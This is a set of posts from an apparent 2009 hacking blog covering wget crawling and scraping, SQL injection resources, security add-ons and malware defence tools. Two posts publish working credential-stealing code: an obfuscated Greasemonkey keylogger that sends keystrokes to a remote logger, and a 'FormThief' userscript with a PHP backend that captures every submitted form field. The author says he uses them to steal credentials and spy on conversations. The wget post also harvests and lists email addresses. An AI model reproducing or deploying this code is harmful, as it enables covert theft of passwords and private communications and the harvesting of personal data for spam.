And while he analyzed the most used web security scanners, I wonder if we could change our direction and focus on a not so well know, open source web application scanner.

Probably you’ve figured about now what I’m talking about, as writen in the title, I’m talking about “web application attack and audit framework” or w3af.

The authors describe it for short:

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

While this resembles the ideea (and direction) by which the project started, for me it seems that w3af is so much of a framework as Joomla! is for web applications development. I would rather call it a full featured web application testing platform.

Even if I’m not that big of a fan for automated vulnerability scanners, I have to admit that w3af has a nice series of discovery plugins which are enough reasons for me to give it thumbs up.

That’s all I wanted to share with you today. For more information about w3af I recommend their source forge page and Andre Riancho’s interview for OWASP podcast (this dude is the core developer of w3af)

Needles to say, I too was tempted in creating my own framework. Ideas kept flowing in, the project has been started and then BAM, I’ve read an interesting article on GNUCITIZEN, which made me rethink my strategy…

One of the comments pointed it out very well:

most of the stuff we need is on the shell already. pentesting frameworks is like the new security-testing hype. first we had hundreds of portscanners, then hundreds of webapp MiTM proxies, then hundreds of fuzzers, then hundreds of SQL injectors, now it’s about pentesting frameworks :)

So instead of starting to write redundant code, I started to learn already available command line tools, which have years of development behind and fill in almost every aspect they need to.

Basically I’m building my framework around already available tools, and only code up things that do not exist, or for some very particular cases.

So why WGet?

Well I had to start with something my series of articles (it’s gonna be a series), and wget seemed to be a good starting point.

If you’ve never dealt with wget (which I sincerely doubt), the following description best describes it:

GNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. It is a non-interactive commandline tool, so it may easily be called from scripts, cron jobs, terminals without X-Windows support, etc

Without further useless rambling let’s see in which scenarios you would use wget; apart from downloading psyBNC archives, like seen on many h4x00r websites.

Website crawling

There are a couple of tools that facilitate website crawling, I even mentioned one in my Intercepting Proxies? article with the difference that liveHTTPHeaders may be used for passive crawling of websites…

So how would we go on crawling a website with wget?

wget -r -nd --spider -o links.txt http://insanesecurity.info

Where:

• r – recursive crawling
• nd – don’t create directories
• spider – do not save pages, discard after collecting links from them
• o – save output to file links.txt

But what if we would want to restrict the crawling only under a directory, and filter out CSS, images and Javascript files?

wget -r -nd --spider -o links.txt -np -R js,css,jpg,png,gif http://insanesecurity.info/blog/

Where:

• np – do not go to parent directory
• R – one or more extensions to reject (comma separated)

After the command finishes the content of links.txt would look like this (assuming you’ve run the first command):

Spider mode enabled. Check if remote file exists.
--2009-07-07 16:46:58--  http://insanesecurity.info/
Resolving insanesecurity.info... 93.115.201.3
Connecting to insanesecurity.info|93.115.201.3|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://insanesecurity.info/blog/ [following]
Spider mode enabled. Check if remote file exists.
--2009-07-07 16:47:01--  http://insanesecurity.info/blog/
Connecting to insanesecurity.info|93.115.201.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Remote file exists and could contain links to other resources -- retrieving.

--2009-07-07 16:47:01--  http://insanesecurity.info/blog/
Connecting to insanesecurity.info|93.115.201.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.html'

From this point, the retrieval of links is just a mater of using grep, cut, sort and uniq.

cat links.txt | grep -P "\-\-\d{4}" | cut -d " " -f 4 | sort | uniq

And the output would be like:

http://insanesecurity.info/

http://insanesecurity.info/2009/01/hacking-yahoogmailhotmail-accounts-a-z-guide/

http://insanesecurity.info/2009/01/javascript-userscript-keylogger/

http://insanesecurity.info/2009/01/logging-the-http-requests/

http://insanesecurity.info/2009/01/password-insecurity-wordlists-dictionaries/

http://insanesecurity.info/2009/01/the-future-of-av-or-not/

http://insanesecurity.info/2009/01/the-hackers-underground-handbook-review/

http://insanesecurity.info/2009/01/useratuh-frontend-to-backend-encryption/

Copying websites

Or website mirroring as people use to call it.

There are a couple of reasons why you would do this;

• To have a copy which you can transport on a CD/DVD/Memory card/etc, having the possibility to convert the links to point to local files.
• Content to feed email scrappers

For our first scenario, you would run wget in the following manner:

wget -m -k -p -np http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/

Where:

• m – mirror website
• k – convert html links to local files
• p – get page dependencies (css, images)
• np – do not go to parent folders

And as far as using it for scrapping purpose, we use the most simplistic commands:

wget http://tinyurl.com/nqa48q
cat downloaded-file | grep -o -P "\w+\[at\]\w+" > emails.txt

And this way I have gathered a list of 40 email addresses… a sample of them:

ureachnirav[at]yahoo
reachjag[at]yahoo
g2[at]g2designindia
g2design[at]rediffmail
archsumitjoshi[at]yahoo
joshi[at]hexagon
rohankarswapnil[at]yahoo
sandy004[at]yahoo
idc[at]iitb
visakan[at]gmail

Of course that for replacing the [at] in them, we can simply use sed:

cat emails.txt | sed -r "s/\[at\]/@/g" > normal-emails.txt

Blog spam

This is also possible (and simple) to achieve with wget and minor interference from grep and sed, but for this one I will not post an example… There are already hundreds of spammers out there, so why add more to the list? If interest exists in wget from your part you will find out how…

Of course for this you will need to script the behavior (bash, bat, perl, python, etc), or create a lengthy command line.

FTP Copy

As mentioned at the beginning of article wget can very well work with the ftp protocol as well.

wget -r --ftp-user=anonymous --ftp-password=some@email.com ftp://ftp.ro.freebsd.org/pub/FreeBSD/

Here I think is no need to explain the command line arguments, they are pretty obvious.

Anonymous mode

When I’m referring to anonymous mode, I’m referring to channel wget requests through proxy servers. First you need to configure your .wgetrc file. If you haven’t got one, you may as well create it now.

#############################
###
### Sample Wget initialization file .wgetrc
###

## You can use this file to change the default behaviour of wget or to
## avoid having to type many many command-line options. This file does
## not contain a comprehensive list of commands -- look at the manual
## to find out what you can put into this file.
##
## Wget initialization file can reside in /usr/local/etc/wgetrc
## (global, for all users) or $HOME/.wgetrc (for a single user).
##
## To use the settings in this file, you will have to uncomment them,
## as well as change them, in most cases, as the values on the
## commented-out lines are the default values (e.g. "off").

##
## Global settings (useful for setting up in /usr/local/etc/wgetrc).
## Think well before you change them, since they may reduce wget's
## functionality, and make it behave contrary to the documentation:
##

# You can set retrieve quota for beginners by specifying a value
# optionally followed by 'K' (kilobytes) or 'M' (megabytes).  The
# default quota is unlimited.
#quota = inf

# You can lower (or raise) the default number of retries when
# downloading a file (default is 20).
#tries = 20

# Lowering the maximum depth of the recursive retrieval is handy to
# prevent newbies from going too "deep" when they unwittingly start
# the recursive retrieval.  The default is 5.
#reclevel = 5

# Many sites are behind firewalls that do not allow initiation of
# connections from the outside.  On these sites you have to use the
# `passive' feature of FTP.  If you are behind such a firewall, you
# can turn this on to make Wget use passive FTP by default.
#passive_ftp = off

# The "wait" command below makes Wget wait between every connection.
# If, instead, you want Wget to wait only between retries of failed
# downloads, set waitretry to maximum number of seconds to wait (Wget
# will use "linear backoff", waiting 1 second after the first failure
# on a file, 2 seconds after the second failure, etc. up to this max).
waitretry = 10

##
## Local settings (for a user to set in his $HOME/.wgetrc).  It is
## *highly* undesirable to put these settings in the global file, since
## they are potentially dangerous to "normal" users.
##
## Even when setting up your own ~/.wgetrc, you should know what you
## are doing before doing so.
##

# Set this to on to use timestamping by default:
#timestamping = off

# It is a good idea to make Wget send your email address in a `From:'
# header with your request (so that server administrators can contact
# you in case of errors).  Wget does *not* send `From:' by default.
#header = From: Your Name 

# You can set up other headers, like Accept-Language.  Accept-Language
# is *not* sent by default.
#header = Accept-Language: en

# You can set the default proxies for Wget to use for http and ftp.
# They will override the value in the environment.
http_proxy = http://1.2.3.4:8080/
#ftp_proxy = http://proxy.yoyodyne.com:18023/

# If you do not want to use proxy at all, set this to off.
use_proxy = on

# You can customize the retrieval outlook.  Valid options are default,
# binary, mega and micro.
#dot_style = default

# Setting this to off makes Wget not download /robots.txt.  Be sure to
# know *exactly* what /robots.txt is and how it is used before changing
# the default!
#robots = on

# It can be useful to make Wget wait between connections.  Set this to
# the number of seconds you want Wget to wait.
#wait = 0

# You can force creating directory structure, even if a single is being
# retrieved, by setting this to on.
#dirstruct = off

# You can turn on recursive retrieving by default (don't do this if
# you are not sure you know what it means) by setting this to on.
#recursive = off

# To always back up file X as X.orig before converting its links (due
# to -k / --convert-links / convert_links = on having been specified),
# set this variable to on:
#backup_converted = off

# To have Wget follow FTP links from HTML files by default, set this
# to on:
#follow_ftp = off

I saved the file in my C:/Windows folder, but you may save it any other place you like. Under Linux you may already have this file in your /etc folder, so just modify it there.

As you may notice in the configuration file above (If you’ve looked closely) I have enabled the http_proxy and set up a proxy.

set WGETRC=C:/Windows/.wgetrc
wget --proxy=on http://insanesecurity.info/blog/

The first line is necessary under Windows if you haven’t set up till know the custom .wgetrc, while the second command enables the proxy and executes a request.

Tweaking it

This is just a quick intro on the most common usages of wget… Besides the ones mentioned here it also comes with a handful of other configuration options which you may look into…

Hopefully this article will be read by those who all day long write scrappers and spiders… I’m tired of bumping constantly over those types of scripts :)

While they treated virtualization aspect from a server point of view, virtualization can be useful for home/work users. How? By giving a hand in the most problematic/annoying problems – malware. A little link to Wikipedia about Virtualization.

Virtual Workstation

I see this approach as the less likely, but even so it is a good example of the principle. You install the OS you use for work (general usage) in the virtual machine, along with all the software/configuration it needs and in the end take a snapshot of it’s state. You conduct your work on the virtual machine with no threat upon your physical machine. And in the unfortunate situation of the virtual machine being crippled by a Malware you just restore the last snapshot as noting would have happened.

I recommend VirtualBox for creating/managing/working with virtual machines.

Data freezing (?)

Actually I just made up that term. I’m actually refering to hard drive virtualization, you know like DeepFreeze does (now you see from where I made up the term), not as secure as running in the virtual machine because there were exploits which circumvented the software by neutralizing it. But you shouldn’t be worried about that, such bugs disappear really fast, and the chance of getting a Malware which to exploit that are minimal; there was no such malware piece known till now.

Very useful to have in iCafes where people come and go, but malware stays. As mentioned before DeepFreeze does the job very well, but there is a freeware (for home usage) program which promises to do the same thing: Returnil.

Sandboxing

In computer security, a sandbox is a security mechanism for safely running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers and untrusted users. The sandbox typically provides a tightly-controlled set of resources for guest programs to run in, such as scratch space on disk and memory. Network access, the ability to inspect the host system or read from input devices are usually disallowed or heavily restricted. In this sense, sandboxes are a specific example of virtualization. (Wikipedia)

A common tool used for this job is Sandboxie, which I can say I am more than satisfied on it’s workings. Commonly this method of virtualization security will be the best, and the most accessible in terms of data sharing between virtual and physical environment.

Another thing about malware, as I pointed it out in my article about the AV industry, they tend to use the same code with minor modification; to be read as strains. If you’re new to this term (Malware), then I would recommend you an introductive article: Stop malware in it’s tracks.

Following the latest article on F-Secure Downadup has 2,395,963 infections worldwide. Of course this is an optimistic scenario, even for a skeptic person at numbers as I am. You can see now the big threat that malware posses, that’s why we should protect ourselves…

Greasemonkey: Malware Script Detector

Malware Script Detector is a Greasmonkey script which will:

Detect & Alert Malicious JavaScript : XSSProxy, XSS-Shell, AttackAPI, Beef. But No guarantee for full prevention of XSS-Injection threats. Many ways to bypass it such as via iframes but I’m sure it protects you from casual attackers.The main objective of developing Malware Script Detector is that I’m so much afraid of XSSProxy, XSS-Shell, AttackAPI, Beef and I want to detect them. Malicious sites intentionally embed them. Firefox XSS Warning addon can’t check this.

It’s a highly recommended script, because malware scripts can be as dangerous as normal malware. The difference is that normal malware posses little threat if you download software from official sources, and verify the checksum…

Malware Blocker

Malware Blocker is a tool useful before and after infection. The description of the program (as taken from SourceForge):

Malware-Blocker blocks communication from your computer to any server that is known to be a malicious one. It does that by replacing your HOSTS file (deep inside Windows directory) with a blacklist of malicious servers, which are redirected to 0.0.0.0

The projects last update is from February 2005. Although likely outdated it maintains a constant number of downloads, this being the reason I recommend it. Who knows what funky old school malware will you cross upon one day…

MalZilla

This is an unexpected turn, is it? First of all you would probably like to know what MalZilla is. In simple words:

Malzilla is an advanced malware-hunting tool specialized for hunting web-based exploits, decode obfuscated JavaScripts etc.

Although limited only for malware scripts I can guaranty you that its very good at it, giving you all the tools needed for such a task. More information in it’s own pdf file, which comes along with the package.

Most of you can ignore the last application presented, I would think that having the first two installed is more than enough for regular users. And no, it’s not dangerous playing with malware if you got the proper tools.

That is one way to name it. I see SQL Injections as vulnerabilities that should have died long ago… Not because they’ve been around for too long (look at buffer overflows), but because they are simple to prevent… Seeing the high number of new developers that pop up every year, with no secure coding habits, I foresee a great future for SQL Injections, as well as for any other web application vulnerability.

Leaving aside the sarcasm, I’ve written this article with the sole purpose of sharing SQL Injection related resources that I did find useful.

RTFM!? (Read The “Funky” Manual)

Before even trying to understand what SQL Injection is, you should have (at least) basic knowledge on the type of database that the SQL Injection back end has and it’s syntax (the ANSI/ISO SQL standard and DBMS specific functions/procedures/tables). Best direction for a start up (and quick reference) on a specific DBMS is it’s own manual:

• MS SQL (Transact-SQL)
• MySQL
• Oracle
• PostgreSQL

Note here (and through the whole article) that I will emphasis on MSSQL, MySQL, Oracle and PostgreSQL, because they are the most common DBMS’s you’ll encounter.

SQL Injection 101

You should understand basic SQL Injection attacks. I linked to OWASP’s article on SQL Injection, but you could search another one (there are plenty on the web) which may seem more appropriate to you. Also don’t forget to dive in Blind SQL Injections.

From that point onward it goes on with a bit of practice (there are a couple of challenge websites) and some DBMS specific techniques. The following articles are some examples on the subject:

• MySQL table and column names
• MySQL into outfile
• SQL Injection and Oracle
• Manipulating SQL Server Using SQL Injection

As I said, these are just a few examples. Other interesting (MySQL) techniques would be the ones using Benchmark() and Procedure Analyze().

SQL Injection Cheat Sheet

The most helpful resources when you’re doing SQL Injection attacks manually. I personally use Ferruh’s and pentestmonkey’s cheat sheets. You should not stop at only these two, there are many other cheat sheets (DBMS specific also) available. The best option would be to union more cheat sheets (some have exotic vectors, while other have more detailed examples) and from those select what you think would be appropriate for your cheat sheet.

Browserware

There are two firefox add-on’s that I would suggest for SQL Injection testing. The first one is HackBar, which I find very useful when exploiting SQL Injections from the browser directly (extracting/enumerating/dumping), while the second is SQL Inject Me, add-on which will prove useful in the pages with many input fields.

A Little Extra

Although SQL Injections can be exploited manually on several occasions (and based on your laziness) you’ll want to automate the job of extracting/detecting/dumping/bruteforcing (?) a Database. Here the following scripts/apps would prove handy…

SQLMap
sqlmap is an open source command-line automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

MultiInjector
MultiInjector is a mass exploitation tool (automated defacement). You basically give to the application a list of targets and payload, while it will fuzz all the found parameters by appending the payload to it. Check the website for more information.

Blind Sql Injection Brute Forcer version 2
This is a modified version of ‘bsqlbfv1.2-th.pl’. This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported: MSSQL, MySQL, PostgreSQL and Oracle.

SQLNinja

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

SQLBrute
SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle.

This is just a small list, for more check out the top 15 sql injection scanners back at security-hacks.

Bruteforce?

If you can’t SQL Inject a website, you can bruteforce the login credentials (if external access is allowed). Just download medusa/hydra (I prefer Hydra, due to Windows support :) generate a custom wordlist for your scenario (resource on wordlists and common passwords), and hit enter.

I know I’ve gone a bit off topic with the bruteforcing section, but I guess it didn’t hurt nobody a little more info.

AND 1=0

Have any suggestion? Feel free to contribute with comments/articles/cheat sheets, or any other resource which would improve this article.

Having some time at hands today, I decided to make one myself. Basically I made it under three steps (was specially thought for a post). First of all this was the starting point of it, a.k.a. typical javascript keylogger:

var keys='';
document.onkeypress = function(e) {
	get = window.event?event:e;
	key = get.keyCode?get.keyCode:get.charCode;
	key = String.fromCharCode(key);
	keys+=key;
}
window.setInterval(function(){
	new Image().src = 'http://localhost/junkylogger.php?keys='+keys;
	keys = '';
}, 1000);

As you can see from the code a javascript keylogger is quite simple. Attach a function to the key pressing event, extract the character (the code of it) in the event and save it into a variable. Also declare a function (within an interval) that will send the logged keys to the backend which will save it into file/database.

As malefic as it seems you should be real lucky to succeed in using it as a relevant keylogger. It would be a good module in an XSS worm. Wanting more from a keylogger, I moved onward to GreaseMonkey which allows me to have a functional keylogger on every website I wish. Most of it it’s the same, difference is that I used GM_setValue/GM_getValue for storing the keys and had to use unsafeWindow for accesing the key pressing event.

GM_setValue('keys', '');
unsafeWindow.onkeypress = function(e) {
	eventobj = window.event?event:e;
	key = eventobj.keyCode?eventobj.keyCode:eventobj.charCode;
	keys = GM_getValue('keys');
	keys+= String.fromCharCode(key);
	GM_setValue('keys', keys);
}

window.setInterval(function(){
	new Image().src = 'http://localhost/junkylogger.php?keys='+GM_getValue('keys');
	GM_setValue('keys', '');
}, 1000);

download/install/view

The next step was to give it a more obfuscated look, just to give a harder life to all those who understand Javascript to the minimum and take a look at the source of the script.

window.wrap = window;
wrap.strf = String.fromCharCode;
wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);
wrap.ev   = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);
GM_setValue('q','');
Function('func', wind+"."+ev+" = func")(function(e) {
	e=window.event?window.event:e;
	k=e.charCode?e.charCode:e.keyCode;
	k=GM_getValue('q')+strf(k);
	GM_setValue('q', k);
});
wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);
wrap.loc+= strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);
wrap.loc+= strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);
window.setInterval(function(){new Image().src=wrap.loc+GM_getValue('q');GM_setValue('q','')},1000);

download/install/view

No, by downloading this you won’t have all your keystrokes logged (unless someone hacked the server and replaced it) because for testing I’ve used a php file on my localhost for logging, and that remained in the examples also.

If you are new at Javascript/Userscripts the following links may be helpful to you: Dive Into GreaseMonkey, GreaseSpot and Javascript eBooks. And yes Userscripts are also available for IE/Opera…

Eleven days ago Microsoft did a disclosure on the MS09-002. Seven days later we already had a proof of concept that was used in the wild, and today having even the Metasploit exploit.

Eleven days have passed, did you patch the vulnerability? Most of the users will not have it patched too soon, even if it comes with the automatic updates. Many just simply have automatic updates turned off. Even so, there are some patches which take a long time to be released, for example the MS08-078 patch did take a while to be released.

And here comes in Exploit Shield an application which will protect your from browser based exploits (either IE or Firefox), but don’t over trust it, as soon as a patch comes out you should fix the vulnerability.

Exploit Shield is designed to shield Web browsers between the development of an exploit and the release of the vendor’s patch.

Exploit Shield posses the following functionality: Zero Day Defense, Patch-Equivalent Protection, Proactive Measures, Protects Against All Websites and Automatic Feedback.

But does it work? Of course it does, check out the detection of a MS09-002 based exploit which was catched by the heuristics incorporated in the software.

It’s also a program that would be useful when researching/coding such exploits, although the automatic submission should be disabled in that case (*grin*).

If you haven’t got it yet, you can download it from here.

Over the pass time I have collected a bunch of interesting bookmarklets, from which a couple are security oriented, more or less, and which I’d like to share with you.

jsShell – probably one of the most appreciated bookmarklets out there. Upon execution it pops up a window in which you can execute javascript code. Among it’s great features is the props() function which displays the methods/properties of a desired element, object, string, etc.

jsEval – a quick and slick way to run small pieces of javascript code.

jsEnv – useful Bookmarklet/UserScript development environmnent. For running other small scripts, I’d still recommend the jsShell.

modCookie – easy and fast cookie tampering.

formInfo – get the information about all the forms (and it’s fields) in the active page. Has the ability to swap between form methods, and to submit them from the generated page.

formReport – same as formInfo, just less colorfull :). And without the swap and submit features.

formPassword2Text – convert all password input fields to text ones.

formHidden2Text – converts input with type hidden to text.

formNoMax – remove max length restriction.

searchOnGoogle – search website via google

findRedirects – find redirects in links

findEmailLinks – find email links in page.

findLinks – scraps all the links in the page.

searchIP – searches more domains on the same IP address.

checkSecurity – check the crossdomain.xml and robots.txt files.

viewScripts – view the currently included scripts.

viewCSS – view currently included style sheets.

For these and more bookmarklets check them out on… Google -> Bookmarklets… Note: some may not work in other browsers than Firefox, like the jsShell for example…

And if you weren’t sure till know, I assure you I’m going to speak about Firefox Addons.

LiveHTTPHeaders

Useful addon for both developers and hackers. It let’s you analyze the HTTP requests and responses done at/from a specified point. It also allows you to modify the requests as you want, from parameters to HTTP headers, anything is possible.

For those that use intercepting proxies in passive mode, for grabbing links while browsing, which later will be passed to some web application scanner (or something like that), guess what: liveHTTPHeaders supports that also.

Download: liveHTTPHeaders

Tamper Data

On several occasions you may want to modify/forge requests in the first submission of a page/form. For that reason Tamper Data is another addon that shouldn’t miss from your toolbox. The functionality I mentioned is just the tip of the iceberg regarding Tamper Data.

Screenshots and download: Tamper Data

HackBar

But what if you don’t need to modify headers, just the content or parameters? Should use Tamper Data just for that?

The answer is obviously NO! Just press F9 (HackBar shortcut key) and you’re ready to tamper/forge requests as you wish. It’s a great addon not just because it eases work with long URLs, but also has the ability to send POST requests for you, thus relieving you from having another window/tab for executing forged POST requests. Did I also mentioned how helpful it can be when working with SQL Injections? No?! I wonder how could I omit that?…

Screenshots and download: HackBar

Final notes

In the end it’s up to you to decide how you’ll do from this point onward. Either work with the suggested plugins, or continue your ritual with intercepting proxies. There is no good/bad way of doing it, it’s just a matter of taste. Some people (including myself) like to do as much possible from the browser before firing up another application…

Last userscript I wrote was a keylogger, which seems that a lot of people have liked, and which for the most common of its use was an overkill.

Why overkill? Because most of those (if not all) who search for a keylogger will use it for stealing credentials. That was also my reason for writing it in the first place, although recently use it for spying web based IM conversations >:). Also may have been circumvented by most common anti-keylogger tricks, like on-screen keyboards.

FormThief (that’s how I named the userscript) even if not perfect, a.k.a. authentication fails in places where forms have an associated an action on the submit event (such example may be login.yahoo.com) will be quite enough for most of the cases you’ll want it. The script has the following code:

(function(){
    var num = document.forms.length;
    for(var i=0;i<num;i++) {
        unsafeWindow.document.forms[i].addEventListener('submit', function(e) {
            var form = e.currentTarget;
            var num = form.length;
            var send = '?';
            for(var i=0;i<num;i++) {
                send += form[i].name + '=';
                send += form[i].value + '&';
            }
            send += 'ThiefedURL=' + unsafeWindow.location;
            new Image().src = 'http://127.0.0.1/fj.php'+encodeURI(send);
            return true;
        }, true);
    }
})()

view/install

As in the junkylogger have used unsafeWindow for accessing the content, and the Image object to send the logged/hijacked data. As for the logging php file you could take the same approach as I did:

$str = "\n\n";
foreach($_GET as $key=>$val) {
    $str .= $key.'['.$val.']'."\n";
}

$fp = fopen('data.txt', 'a');
fwrite($fp, $str);
fclose($fp);

Nothing new in the concept, just wanted to share it with you because I felt that it is a good addition to the Userscript keylogger, completing it where it could have failed and vice versa. With well crafted @include, @exclude metadata’s the two userscripts can make wonders, at least for me ;)

UPDATE: modified the userscript, attached the function as kl suggested, know it works in any page (even login.yahoo.com). Also now appending the ThiefedURL parameter to see in the logs which form was hijacked.